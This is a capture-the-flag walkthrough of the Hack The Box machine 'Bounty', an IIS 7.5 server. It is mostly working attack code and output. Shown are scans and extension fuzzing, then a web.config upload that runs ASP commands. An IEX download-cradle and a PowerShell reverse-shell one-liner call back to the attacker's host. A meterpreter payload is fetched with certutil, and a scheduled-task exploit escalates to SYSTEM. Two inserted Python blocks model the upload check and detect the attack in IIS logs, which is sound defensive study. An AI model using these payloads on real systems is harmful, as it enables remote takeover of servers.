Bounty
Ports scan
Masscan found only port 80 open.
root@kali:~/HTB/Machines/Bounty# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.93 --rate=1000

Starting masscan 1.0.5 at 2019-11-30 14:50:52 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.93
nmap
root@kali:~/HTB/Machines/Bounty# nmap -sC -sV 10.10.10.93
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-30 19:02 EST
Nmap scan report for bounty.htb (10.10.10.93)
Host is up (0.044s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.62 seconds
IIS 7.5 was included in Windows 7 and Windows Server 2008 R2.
Web enumeration
Main page
root@kali:~/HTB/Machines/Bounty# curl -v http://10.10.10.93/
*   Trying 10.10.10.93:80...
* TCP_NODELAY set
* Connected to 10.10.10.93 (10.10.10.93) port 80 (#0)
> GET / HTTP/1.1
> Host: 10.10.10.93
> User-Agent: curl/7.66.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Content-Type: text/html
< Last-Modified: Thu, 31 May 2018 03:46:26 GMT
< Accept-Ranges: bytes
< ETag: "20ba8ef391f8d31:0"
< Server: Microsoft-IIS/7.5
< X-Powered-By: ASP.NET
< Date: Sun, 01 Dec 2019 00:32:01 GMT
< Content-Length: 630
<
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Bounty</title>
<style type="text/css">
<!--
body {
	color:#000000;
	background-color:#B3B3B3;
	margin:0;
}

#container {
	margin-left:auto;
	margin-right:auto;
	text-align:center;
}

a img {
	border:none;
}

-->
</style>
</head>
<body>
<div id="container">
<a href=""><img src="merlin.jpg" alt="IIS7" width="571" height="411" /></a>
</div>
</body>
* Connection #0 to host 10.10.10.93 left intact
</html>
The image gives no further information.
root@kali:~/HTB/Machines/Bounty# wget http://bounty.htb/merlin.jpg
--2019-11-30 10:08:28--  http://bounty.htb/merlin.jpg
Resolving bounty.htb (bounty.htb)... 10.10.10.93
Connecting to bounty.htb (bounty.htb)|10.10.10.93|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 780732 (762K) [image/jpeg]
Saving to: ‘merlin.jpg’

merlin.jpg          100%[===================>] 762.43K  1.69MB/s    in 0.4s

2019-11-30 10:08:28 (1.69 MB/s) - ‘merlin.jpg’ saved [780732/780732]

root@kali:~/HTB/Machines/Bounty# strings merlin.jpg
Dirsearch
The first search uses only the txt extension, with directory detection, against the large wordlist, to map the site structure.
root@kali:~/HTB/Machines/Bounty# python3 ../../Utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "txt" -f -t 1000 -u http://10.10.10.93

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: txt | HTTP method: get | Threads: 1000 | Wordlist size: 441041

Error Log: /root/HTB/Utils/dirsearch/logs/errors-19-11-30_10-20-05.log

Target: http://10.10.10.93

[10:20:05] Starting:
[10:21:42] 403 -    1KB - /UploadedFiles/
[10:22:00] 403 -    1KB - /uploadedFiles/
[10:23:23] 403 -    1KB - /uploadedfiles/

Task Completed
There is a folder uploadedfiles. The second iteration uses more extensions, but the smaller wordlist.
root@kali:~/HTB/Machines/Bounty# python3 ../../Utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e "php,asp,aspx,js" -f -t 1000 -u http://10.10.10.93

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, js | HTTP method: get | Threads: 1000 | Wordlist size: 438229

Error Log: /root/HTB/Utils/dirsearch/logs/errors-19-11-30_10-35-30.log

Target: http://10.10.10.93

[10:35:30] Starting:
[10:36:06] 200 -  974B - /transfer.aspx
[10:36:29] 400 -   11B - /%2Acheckout%2A.aspx
[10:37:28] 400 -   11B - /%2Adocroot%2A.aspx
[10:37:46] 400 -   11B - /%2A.aspx
[10:38:12] 400 -   11B - /http%3A%2F%2Fwww.aspx
[10:39:04] 400 -   11B - /q%26a.aspx
[10:39:06] 400 -   11B - /http%3A.aspx
[10:39:49] 400 -   11B - /%2A%2Ahttp%3a.aspx
[10:39:56] 403 -    1KB - /UploadedFiles/
[10:40:25] 403 -    1KB - /uploadedFiles/
[10:41:27] 400 -   11B - /%2Ahttp%3A.aspx
[10:42:39] 400 -   11B - /%2A%2Ahttp%3A.aspx
[10:42:54] 403 -    1KB - /uploadedfiles/
[10:43:20] 400 -   11B - /http%3A%2F%2Fyoutube.aspx
[10:43:21] 400 -   11B - /http%3A%2F%2Fblogs.aspx
[10:43:22] 400 -   11B - /http%3A%2F%2Fblog.aspx
[10:44:44] 400 -   11B - /%2A%2Ahttp%3A%2F%2Fwww.aspx

Task Completed
File upload
The page transfer.aspx shows a form to upload files.
We do a test with a gif file.
The file is uploaded successfully.
We find the file at the URI /uploadedfiles/test.gif.
We try to upload an aspx file.
root@kali:~/HTB/Machines/Bounty# echo test > test.aspx
But as expected, this extension is not allowed.
Determine allowed extensions
The web page https://docs.microsoft.com/en-us/previous-versions/2wawkw1c(v=vs.140)?redirectedfrom=MSDN provides the list of file extensions handled by IIS 7.
root@kali:~/HTB/Machines/Bounty# curl -q "https://docs.microsoft.com/en-us/previous-versions/2wawkw1c(v=vs.140)?redirectedfrom=MSDN" 2>/dev/null | grep "<td><p>\..*</p></td>" | cut -d '>' -f 3 | cut -d '<' -f 1 | sed 's/, /\n/g' | cut -c 2- > extensions.lst
root@kali:~/HTB/Machines/Bounty# cat extensions.lst
asax
ascx
ashx
asmx
aspx
axd
browser
cd
compile
config
cs
vb
csproj
vbproj
disco
vsdisco
dsdgm
dsprototype
dll
licx
webinfo
master
mdb
ldb
mdf
msgx
svc
resources
resx
sdm
sdmDocument
sitemap
skin
sln
soap
asa
cdx
cer
idc
shtm
shtml
stm
css
htm
html
jpg
jpeg
png
tiff
bmp
svg
gif
ico
tga
xcf
dwg
pdf
root@kali:~/HTB/Machines/Bounty# echo test > test.txt
We upload a test file.
We intercept the request and send it to the Intruder module.
Clear the payload positions, and select the file extension as the only payload position.
Load the extensions from extensions.lst as the payload list.
Extract from each response the text between <span id="Label1" style="color: and </span>.
Run the attack: the extracted text reads "File Uploaded successfully." for the accepted extensions.
Sort the results by the extracted column to group the accepted extensions.
We can upload files with these extensions:
- config
- jpg
- jpeg
- png
- gif
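As an added example that is not part of the original writeup: a Python model of the upload check, using the accepted-extension set above as the allow-list. It assumes the form decides on the final extension alone (an assumption, not something the writeup establishes); risky_entries() is the audit that surfaces config as a server-interpreted entry, and hardened_check() is the shape the check should take. All function names and the SERVER_INTERPRETED set are hypothetical.

```python
import re

# Extensions the transfer.aspx form accepted in the Intruder run above.
OBSERVED_ACCEPTED = {"config", "jpg", "jpeg", "png", "gif"}

# Extensions from extensions.lst that IIS or ASP.NET interpret rather than
# serve as static content (hypothetical subset chosen for this example).
SERVER_INTERPRETED = {"asax", "ascx", "ashx", "asmx", "aspx", "asa", "asp", "cer",
                      "config", "shtm", "shtml", "stm", "soap", "svc", "dll"}

# Strict filename shape: one run of safe characters, one dot, one short extension.
# Path separators, extra dots, spaces and other characters never match.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.[A-Za-z0-9]{1,8}")


def extension_of(filename):
    """Lower-cased text after the last dot, or '' when there is no dot."""
    return filename.rsplit(".", 1)[1].lower() if "." in filename else ""


def risky_entries(allow_list):
    """Allow-list entries IIS would interpret: the audit a developer should run
    against the upload form's list. For the observed set this returns {'config'}."""
    return {e.lower() for e in allow_list} & SERVER_INTERPRETED


def weak_check(filename, allow_list=OBSERVED_ACCEPTED):
    """Model (assumed) of the check transfer.aspx applies: extension on the list, nothing else."""
    return extension_of(filename) in allow_list


def hardened_check(filename, allow_list=OBSERVED_ACCEPTED):
    """Strict filename shape, then the allow-list with every server-interpreted entry removed."""
    if not SAFE_NAME.fullmatch(filename):
        return False
    return extension_of(filename) in ({e.lower() for e in allow_list} - SERVER_INTERPRETED)
```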
RCE with web.config
Soroush Dalili's article explains how to execute code remotely from an uploaded web.config file.
Test
root@kali:~/HTB/Machines/Bounty# cat web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 7 by opening the web.config file!
Response.write(3+4)
Response.write("<!-"&"-")
%>
-->
The ASP code is executed: the page prints 7, not the literal 3+4.
Execute systeminfo
root@kali:~/HTB/Machines/Bounty# cat web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' the ASP code below runs when the web.config file is requested
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("cmd /c systeminfo")
output1 = cmd1.StdOut.Readall()
Response.write(output1)
Response.write("</pre><!-"&"-")
%>
-->
Gain a reverse shell
root@kali:~/HTB/Machines/Bounty# cat web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' the ASP code below runs when the web.config file is requested
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("cmd /c powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.34/rs.ps1')")
output1 = cmd1.StdOut.Readall()
Response.write(output1)
Response.write("</pre><!-"&"-")
%>
-->
When requested, this web.config downloads the file rs.ps1 and executes it.
root@kali:~/HTB/Machines/Bounty# cat rs.ps1
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.34',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Open the web server
root@kali:~/HTB/Machines/Bounty# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
Open the listener
root@kali:~/HTB/Machines/Bounty# rlwrap nc -lvnp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Browse the URL
Browse to the uploaded web.config URL. The file rs.ps1 is downloaded:
root@kali:~/HTB/Machines/Bounty# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.93 - - [02/Dec/2019 00:37:54] "GET /rs.ps1 HTTP/1.1" 200 -
And a reverse PowerShell shell opens at the same moment.
root@kali:~/HTB/Machines/Bounty# rlwrap nc -lvnp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.93.
Ncat: Connection from 10.10.10.93:49158.
whoami
bounty\merlin
PS C:\windows\system32\inetsrv>
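A defender-side check for the web.config technique used above, added here as an example that is not part of the original writeup. It parses IIS W3C log lines (constructed for this example, not taken from the target, using the default IIS 7.5 field layout) and flags any request for a server-interpreted file under /uploadedfiles/, recording whether IIS served it and whether the same client POSTed to transfer.aspx shortly before. The function names and the SERVER_INTERPRETED tuple are assumptions.

```python
from datetime import datetime, timedelta

# Constructed IIS 7.5 W3C log lines modelling this writeup's traffic (not real target logs).
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2019-12-01 00:32:01 10.10.10.93 GET / - 80 - 10.10.14.34 curl/7.66.0 200 0 0 15
2019-12-01 00:40:10 10.10.10.93 POST /transfer.aspx - 80 - 10.10.14.34 Mozilla/5.0 200 0 0 31
2019-12-01 00:40:12 10.10.10.93 GET /uploadedfiles/test.gif - 80 - 10.10.14.34 Mozilla/5.0 200 0 0 4
2019-12-01 00:45:02 10.10.10.93 POST /transfer.aspx - 80 - 10.10.14.34 Mozilla/5.0 200 0 0 28
2019-12-01 00:45:05 10.10.10.93 GET /uploadedfiles/web.config - 80 - 10.10.14.34 Mozilla/5.0 200 0 0 1203
2019-12-01 03:10:40 10.10.10.93 GET /uploadedfiles/web.config - 80 - 10.10.14.50 Mozilla/5.0 404 8 0 2
"""

UPLOAD_DIR = "/uploadedfiles/"
# Extensions IIS/ASP.NET hand to a script handler or treat as configuration
# (assumed subset of the extensions.lst table gathered above).
SERVER_INTERPRETED = (".config", ".asp", ".aspx", ".asa", ".ashx", ".asmx", ".cer", ".shtml", ".stm")


def parse_iis_log(text):
    """Yield one dict per request line, keyed by the names in the #Fields: header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            rec = dict(zip(fields, line.split()))
            rec["ts"] = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
            yield rec


def find_executed_uploads(text, window=timedelta(minutes=10)):
    """Flag GETs of server-interpreted files under the upload directory.
    served=True (sc-status 200) means IIS passed the file to a handler; a 404 with
    substatus 7 (extension denied) or 8 (hidden segment) means request filtering
    refused it, the healthy outcome. upload_before: same client POSTed to transfer.aspx within window."""
    last_post = {}  # c-ip -> timestamp of that client's most recent POST /transfer.aspx
    hits = []
    for rec in parse_iis_log(text):
        uri = rec["cs-uri-stem"].lower()
        if rec["cs-method"] == "POST" and uri == "/transfer.aspx":
            last_post[rec["c-ip"]] = rec["ts"]
        elif uri.startswith(UPLOAD_DIR) and uri.endswith(SERVER_INTERPRETED):
            posted = last_post.get(rec["c-ip"])
            hits.append({
                "ts": rec["ts"].isoformat(sep=" "),
                "client": rec["c-ip"],
                "uri": uri,
                "served": rec["sc-status"] == "200",
                "substatus": rec["sc-substatus"],
                "upload_before": posted is not None and rec["ts"] - posted <= window,
            })
    return hits
```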
User flag
PS C:\windows\system32\inetsrv> cd C:\
PS C:\> cd Users\merlin\Desktop
PS C:\Users\merlin\Desktop> cat user.txt
<USER_FLAG>
Privilege escalation
Reverse meterpreter
Create the reverse meterpreter.
root@kali:~/HTB/Machines/Bounty# msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.34 LPORT=5555 -f exe -o metasploit.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 206403 bytes
Final size of exe file: 212992 bytes
Saved as: metasploit.exe
Check that the web server is still listening, then run certutil on the target to fetch the file.
PS C:\windows\system32\inetsrv> cd c:\users\merlin
PS C:\users\merlin> certutil -urlcache -split -f "http://10.10.14.34/metasploit.exe" metasploit.exe
****  Online  ****
  000000  ...
  034000
CertUtil: -URLCache command completed successfully.
The web server logs the download twice.
root@kali:~/HTB/Machines/Bounty# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.93 - - [02/Dec/2019 00:37:54] "GET /rs.ps1 HTTP/1.1" 200 -
10.10.10.93 - - [03/Dec/2019 10:54:38] "GET /metasploit.exe HTTP/1.1" 200 -
10.10.10.93 - - [03/Dec/2019 10:54:39] "GET /metasploit.exe HTTP/1.1" 200 -
Run the Metasploit console, and start the listener on port 5555.
root@kali:~/HTB/Machines/Bounty# msfconsole
msf5 > use multi/handler
msf5 exploit(multi/handler) > set LHOST 10.10.14.34
LHOST => 10.10.14.34
msf5 exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.34:5555
Start the reverse meterpreter.
PS C:\users\merlin> cmd /c metasploit.exe
And the meterpreter session opens.
[*] Sending stage (180291 bytes) to 10.10.10.93
[*] Meterpreter session 1 opened (10.10.14.34:5555 -> 10.10.10.93:49171) at 2019-12-03 11:20:35 -0500

meterpreter > getuid
Server username: BOUNTY\merlin
Exploit to escalate
The meterpreter session runs as merlin; now we need to escalate privileges.
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > search suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester


msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.93 - Collecting local exploits for x64/windows...
[*] 10.10.10.93 - 13 exploit checks are being tried...
[+] 10.10.10.93 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[*] Post module execution completed
msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_092_schelevator
msf5 exploit(windows/local/ms10_092_schelevator) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/ms10_092_schelevator) > set LHOST 10.10.14.34
LHOST => 10.10.14.34
msf5 exploit(windows/local/ms10_092_schelevator) > set LPORT 6666
LPORT => 6666
msf5 exploit(windows/local/ms10_092_schelevator) > run

[*] Started reverse TCP handler on 10.10.14.34:6666
[*] Preparing payload at C:\Windows\TEMP\TKeIxip.exe
[*] Creating task: RT4ADIUWBKw89
[*] SUCCESS: The scheduled task "RT4ADIUWBKw89" has successfully been created.
[*] SCHELEVATOR
[*] Reading the task file contents from C:\Windows\system32\tasks\RT4ADIUWBKw89...
[*] Original CRC32: 0xfc4dee90
[*] Final CRC32: 0xfc4dee90
[*] Writing our modified content back...
[*] Validating task: RT4ADIUWBKw89
[*]
[*] Folder: \
[*] TaskName                                 Next Run Time          Status
[*] ======================================== ====================== ===============
[*] RT4ADIUWBKw89                            1/1/2020 8:47:00 AM    Ready
[*] SCHELEVATOR
[*] Disabling the task...
[*] SUCCESS: The parameters of scheduled task "RT4ADIUWBKw89" have been changed.
[*] SCHELEVATOR
[*] Enabling the task...
[*] SUCCESS: The parameters of scheduled task "RT4ADIUWBKw89" have been changed.
[*] SCHELEVATOR
[*] Executing the task...
[*] Sending stage (180291 bytes) to 10.10.10.93
[*] SUCCESS: Attempted to run the scheduled task "RT4ADIUWBKw89".
[*] SCHELEVATOR
[*] Deleting the task...
[*] Meterpreter session 2 opened (10.10.14.34:6666 -> 10.10.10.93:49163) at 2019-12-02 01:47:08 -0500
[*] SUCCESS: The scheduled task "RT4ADIUWBKw89" was successfully deleted.
[*] SCHELEVATOR

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
The host is vulnerable to many exploits (because it is not patched). I stopped after 3 exploits.
msf5 exploit(windows/local/ms16_075_reflection_juicy) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                                                    Connection
  --  ----  ----                     -----------                                                                    ----------
  1         meterpreter x64/windows  BOUNTY\merlin @ BOUNTY                                                         10.10.14.34:5555 -> 10.10.10.93:49161 (10.10.10.93)
  2         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ BOUNTY                                                   10.10.14.34:6666 -> 10.10.10.93:49163 (10.10.10.93)
  3         shell x64/windows        Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation...  10.10.14.34:7777 -> 10.10.10.93:49165 (10.10.10.93)
  4         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ BOUNTY                                                   10.10.14.34:8888 -> 10.10.10.93:49183 (10.10.10.93)
Root Flag
meterpreter > shell
Process 284 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>cd C:\Users
cd C:\Users

C:\Users>cd Administrator
cd Administrator

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>type root.txt
type root.txt
<ROOT_FLAG>
References
- Internet Information Services
- ASP.NET Web Project File Types
- RCE by uploading a web.config
- Upload a web.config File for Fun & Profit
- Reverse Shell Cheat Sheet
- you can download files with certutil
Daniel Simao 18:53, 30 November 2019 (EST)